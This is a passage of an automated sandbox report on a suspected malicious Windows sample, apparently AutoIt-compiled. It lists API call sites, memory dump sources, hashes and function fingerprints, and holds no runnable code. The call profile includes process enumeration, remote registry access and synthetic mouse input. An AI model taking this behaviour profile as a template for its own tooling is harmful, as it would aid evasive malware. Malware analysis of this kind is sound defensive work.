                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: 540fe71daa3449790b4725efa101d4bc79e5bc13640e60e9523da92976276970
                                    • Instruction ID: 9c206aa01b7fb4b19e265d2e3eda2b1e8f0d8549a1a167a3588a921af7438f7c
                                    • Opcode Fuzzy Hash: 540fe71daa3449790b4725efa101d4bc79e5bc13640e60e9523da92976276970
                                    • Instruction Fuzzy Hash: CA219576601319AFAB159F68DC88DAB73BCEB0D364B00C225FA1DDB251E770EC458B60
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    • API String ID: 1038674560-2734436370
                                    • Opcode ID: 2ae228d04467e39c2c54e15bbe26cbba42667d55678a06588975f7722656bd78
                                    • Instruction ID: e1e62a2aadf3f7d1fb5735c21bc1d9d2a957d2d549042f3363414e0f4d4eec9a
                                    • Opcode Fuzzy Hash: 2ae228d04467e39c2c54e15bbe26cbba42667d55678a06588975f7722656bd78
                                    • Instruction Fuzzy Hash: B2213772204211B7C325AA349C12FBBB3B8EF75310F65C029F88E9B185E7719943C395
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001709CB
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001709F1
                                    • SysAllocString.OLEAUT32(00000000), ref: 001709F4
                                    • SysAllocString.OLEAUT32 ref: 00170A15
                                    • SysFreeString.OLEAUT32 ref: 00170A1E
                                    • StringFromGUID2.COMBASE(?,?,00000028), ref: 00170A38
                                    • SysAllocString.OLEAUT32(?), ref: 00170A46
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: dde0f3b384496ca9939dc03c9b96eb19224eca96398acbc2d832acefd514fb6b
                                    • Instruction ID: 2614e37153b3a4d1f85d47a4bbee2b0bc4752a424f05cc6a6a39196b2e9adcaf
                                    • Opcode Fuzzy Hash: dde0f3b384496ca9939dc03c9b96eb19224eca96398acbc2d832acefd514fb6b
                                    • Instruction Fuzzy Hash: F4215E75204304AF9B159BACDC88DAB77ACEB0C360B01C125F909CB6A1EB70EC818B64
                                    APIs
                                      • Part of subcall function 0014D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0014D1BA
                                      • Part of subcall function 0014D17C: GetStockObject.GDI32(00000011), ref: 0014D1CE
                                      • Part of subcall function 0014D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0014D1D8
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 0019A32D
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0019A33A
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0019A345
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 0019A354
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 0019A360
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    • Opcode ID: e56889b1a33be822f5ef680e658f3a7a82abc2dd163325dafd353576c2305e97
                                    • Instruction ID: 2ed840c9e7efbb78bdb7e05a785445c06c8bc1a60df1854685c84d94bfb8d85e
                                    • Opcode Fuzzy Hash: e56889b1a33be822f5ef680e658f3a7a82abc2dd163325dafd353576c2305e97
                                    • Instruction Fuzzy Hash: A711B2B1150219BEEF159F61CC85EEB7F6DFF08798F014114FA08A60A0C772AC21DBA4
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 0014CCF6
                                    • GetWindowRect.USER32(?,?), ref: 0014CD37
                                    • ScreenToClient.USER32(?,?), ref: 0014CD5F
                                    • GetClientRect.USER32(?,?), ref: 0014CE8C
                                    • GetWindowRect.USER32(?,?), ref: 0014CEA5
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Rect$Client$Window$Screen
                                    • String ID:
                                    • API String ID: 1296646539-0
                                    • Opcode ID: 0a9074b3879b93fc5cea099d22c0137d835c82bb875051890f1277bd0393f925
                                    • Instruction ID: f181e4eeb92540ca526142c20daa696894b96efd60c4b563eabb57b5fd01ef6d
                                    • Opcode Fuzzy Hash: 0a9074b3879b93fc5cea099d22c0137d835c82bb875051890f1277bd0393f925
                                    • Instruction Fuzzy Hash: A0B14E79A00649DBDF54CFA8C5807EDBBB1FF08310F159529EC59EB260EB30A950CBA4
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00191C18
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00191C26
                                    • __wsplitpath.LIBCMT ref: 00191C54
                                      • Part of subcall function 00151DFC: __wsplitpath_helper.LIBCMT ref: 00151E3C
                                    • _wcscat.LIBCMT ref: 00191C69
                                    • Process32NextW.KERNEL32(00000000,?), ref: 00191CDF
                                    • CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00191CF1
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
                                    • String ID:
                                    • API String ID: 1380811348-0
                                    • Opcode ID: ff84c070ae897c6115cb058c9d5b1f01cecb7c20b52d6800791d3e5ef1fa4cc4
                                    • Instruction ID: 21573d7a2c826294c82cfc6c14f32fbc38b375432a6c73489eeba9cedf8a9bf3
                                    • Opcode Fuzzy Hash: ff84c070ae897c6115cb058c9d5b1f01cecb7c20b52d6800791d3e5ef1fa4cc4
                                    • Instruction Fuzzy Hash: 48519F71504301AFD720EF64D885EABB7ECEF98754F00492EF98997291EB70DA44CB92
                                    APIs
                                      • Part of subcall function 00193C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00192BB5,?,?), ref: 00193C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001930AF
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001930EF
                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00193112
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0019313B
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0019317E
                                    • RegCloseKey.ADVAPI32(00000000), ref: 0019318B
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                    • String ID:
                                    • API String ID: 3451389628-0
                                    • Opcode ID: 65d7ca1b7f379d0ef6681c57bf3045d93e24fbf63362359972595c42944e89f4
                                    • Instruction ID: bfb631142685c294cec8d609fdacf465cbbfcca0aca235d27593dd912c156919
                                    • Opcode Fuzzy Hash: 65d7ca1b7f379d0ef6681c57bf3045d93e24fbf63362359972595c42944e89f4
                                    • Instruction Fuzzy Hash: 77513831108300AFCB04EF64D895E6ABBF9FF99314F04492DF555972A1DB71EA05CB92
                                    APIs
                                    • GetMenu.USER32(?), ref: 00198540
                                    • GetMenuItemCount.USER32(00000000), ref: 00198577
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0019859F
                                    • GetMenuItemID.USER32(?,?), ref: 0019860E
                                    • GetSubMenu.USER32(?,?), ref: 0019861C
                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0019866D
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountMessagePostString
                                    • String ID:
                                    • API String ID: 650687236-0
                                    • Opcode ID: 86e6687733bc0756ea4a2314ad5b4e0680590a698253df0f6a5eea73d12b9e39
                                    • Instruction ID: 62c16e9f33eb71edc3d7e1b0ade6d83d0e01e45fb4b49c954f9db31b4623f87a
                                    • Opcode Fuzzy Hash: 86e6687733bc0756ea4a2314ad5b4e0680590a698253df0f6a5eea73d12b9e39
                                    • Instruction Fuzzy Hash: E051CB71A00214EFCF15EFA8C881AAEB7F5FF19310F1140A9E916BB351DB70AE408B90
                                    APIs
                                    • _memset.LIBCMT ref: 00174B10
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00174B5B
                                    • IsMenu.USER32(00000000), ref: 00174B7B
                                    • CreatePopupMenu.USER32 ref: 00174BAF
                                    • GetMenuItemCount.USER32(000000FF), ref: 00174C0D
                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00174C3E
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                    • String ID:
                                    • API String ID: 3311875123-0
                                    • Opcode ID: 1311a54bc1c379021ccf832d48a2b1d25b7bbc74d07e430aec264cbcf7dfee13
                                    • Instruction ID: 82839a9b9b116db74064e3b68c20624f050e44cc61eee026269cc99eddc5b1cd
                                    • Opcode Fuzzy Hash: 1311a54bc1c379021ccf832d48a2b1d25b7bbc74d07e430aec264cbcf7dfee13
                                    • Instruction Fuzzy Hash: EB51E070601209EFDF25CF68D888BADBBF4AF55318F24C159E42D9B291E3B19E44CB52
                                    APIs
                                      • Part of subcall function 0014B34E: GetWindowLongW.USER32(?,000000EB), ref: 0014B35F
                                    • BeginPaint.USER32(?,?,?), ref: 0014AC2A
                                    • GetWindowRect.USER32(?,?), ref: 0014AC8E
                                    • ScreenToClient.USER32(?,?), ref: 0014ACAB
                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0014ACBC
                                    • EndPaint.USER32(?,?,?,?,?), ref: 0014AD06
                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 001AE673
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                    • String ID:
                                    • API String ID: 2592858361-0
                                    • Opcode ID: 071003cb479e7ec6de817f071c721519c3625f0ab10856b0f80728a5ba948163
                                    • Instruction ID: e02bc9081ce6ffba4eb7a3ddd5663cceaca6bad94aa366517fcac0acf4336a8b
                                    • Opcode Fuzzy Hash: 071003cb479e7ec6de817f071c721519c3625f0ab10856b0f80728a5ba948163
                                    • Instruction Fuzzy Hash: 14419E71544201AFC710DF24DC84FBA7BE8EF69330F150669F9A4872B1D771A885DB62
                                    APIs
                                    • ShowWindow.USER32(001F1628,00000000,001F1628,00000000,00000000,001F1628,?,001ADC5D,00000000,?,00000000,00000000,00000000,?,001ADAD1,00000004), ref: 0019E40B
                                    • EnableWindow.USER32(00000000,00000000), ref: 0019E42F
                                    • ShowWindow.USER32(001F1628,00000000), ref: 0019E48F
                                    • ShowWindow.USER32(00000000,00000004), ref: 0019E4A1
                                    • EnableWindow.USER32(00000000,00000001), ref: 0019E4C5
                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0019E4E8
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$Show$Enable$MessageSend
                                    • String ID:
                                    • API String ID: 642888154-0
                                    • Opcode ID: e742345e394690283f004700219a47f392f2913448c1b914d068f3b70f0ccb34
                                    • Instruction ID: 7fdff805af059e8c94f27fdfdf087392a1bf0ae2fb92e1dcf0a28f398c62d851
                                    • Opcode Fuzzy Hash: e742345e394690283f004700219a47f392f2913448c1b914d068f3b70f0ccb34
                                    • Instruction Fuzzy Hash: 0C416A34A01141EFDF26CF28D599B947BE1BF09314F1881A9EA58CF6A2C731E852CB51
                                    APIs
                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 001798D1
                                      • Part of subcall function 0014F4EA: std::exception::exception.LIBCMT ref: 0014F51E
                                      • Part of subcall function 0014F4EA: __CxxThrowException@8.LIBCMT ref: 0014F533
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00179908
                                    • RtlEnterCriticalSection.NTDLL(?), ref: 00179924
                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 0017999E
                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 001799B3
                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 001799D2
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                     • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                    • String ID:
                                    • API String ID: 2537439066-0
                                    • Opcode ID: a9ea14979d9e3a46bc3c6fa2c961ec446d74a56df93112f3662986c018834417
                                    • Instruction ID: 139a5dfb951851c930423487a3bb2475fa44eda7e08f72e478a4072b8e1d243a
                                    • Opcode Fuzzy Hash: a9ea14979d9e3a46bc3c6fa2c961ec446d74a56df93112f3662986c018834417
                                    • Instruction Fuzzy Hash: CD316F31900105EBDB10EFA4DC85EAFB7B8FF45314B1481B9F905AB296EB70DA55CBA0
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,001877F4,?,?,00000000,00000001), ref: 00189B53
                                      • Part of subcall function 00186544: GetWindowRect.USER32(?,?), ref: 00186557
                                    • GetDesktopWindow.USER32 ref: 00189B7D
                                    • GetWindowRect.USER32(00000000), ref: 00189B84
                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00189BB6
                                      • Part of subcall function 00177A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00177AD0
                                    • GetCursorPos.USER32(?), ref: 00189BE2
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00189C44
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                    • String ID:
                                    • API String ID: 4137160315-0
                                    APIs
                                      • Part of subcall function 0013936C: __swprintf.LIBCMT ref: 001393AB
                                      • Part of subcall function 0013936C: __itow.LIBCMT ref: 001393DF
                                      • Part of subcall function 0014C6F4: _wcscpy.LIBCMT ref: 0014C717
                                    • _wcstok.LIBCMT ref: 0018184E
                                    • _wcscpy.LIBCMT ref: 001818DD
                                    • _memset.LIBCMT ref: 00181910
                                    Strings
                                    Similarity
                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                    • String ID: X
                                    • API String ID: 774024439-3081909835
                                    APIs
                                      • Part of subcall function 0014AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0014AFE3
                                      • Part of subcall function 0014AF83: SelectObject.GDI32(?,00000000), ref: 0014AFF2
                                      • Part of subcall function 0014AF83: BeginPath.GDI32(?), ref: 0014B009
                                      • Part of subcall function 0014AF83: SelectObject.GDI32(?,00000000), ref: 0014B033
                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0019EC20
                                    • LineTo.GDI32(00000000,00000003,?), ref: 0019EC34
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0019EC42
                                    • LineTo.GDI32(00000000,00000000,?), ref: 0019EC52
                                    • EndPath.GDI32(00000000), ref: 0019EC62
                                    • StrokePath.GDI32(00000000), ref: 0019EC72
                                    Similarity
                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                    • String ID:
                                    • API String ID: 43455801-0
                                    APIs
                                    • GetDC.USER32(00000000), ref: 0016E1C0
                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0016E1D1
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0016E1D8
                                    • ReleaseDC.USER32(00000000,00000000), ref: 0016E1E0
                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0016E1F7
                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0016E209
                                      • Part of subcall function 00169AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00169A05,00000000,00000000,?,00169DDB), ref: 0016A53A
                                    Similarity
                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                    • String ID:
                                    • API String ID: 603618608-0
                                    APIs
                                    • __init_pointers.LIBCMT ref: 00157B47
                                      • Part of subcall function 0015123A: __initp_misc_winsig.LIBCMT ref: 0015125E
                                      • Part of subcall function 0015123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00157F51
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00157F65
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00157F78
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00157F8B
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00157F9E
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00157FB1
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00157FC4
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00157FD7
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00157FEA
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00157FFD
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00158010
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00158023
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00158036
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00158049
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0015805C
                                      • Part of subcall function 0015123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0015806F
                                    • __mtinitlocks.LIBCMT ref: 00157B4C
                                      • Part of subcall function 00157E23: InitializeCriticalSectionAndSpinCount.KERNEL32(001EAC68,00000FA0,?,?,00157B51,00155E77,001E6C70,00000014), ref: 00157E41
                                    • __mtterm.LIBCMT ref: 00157B55
                                      • Part of subcall function 00157BBD: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00157D3F
                                      • Part of subcall function 00157BBD: _free.LIBCMT ref: 00157D46
                                      • Part of subcall function 00157BBD: RtlDeleteCriticalSection.NTDLL(001EAC68), ref: 00157D68
                                    • __calloc_crt.LIBCMT ref: 00157B7A
                                    • GetCurrentThreadId.KERNEL32 ref: 00157BA3
                                    Similarity
                                    • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                    • String ID:
                                    • API String ID: 2942034483-0
                                    APIs
                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0013281D
                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00132825
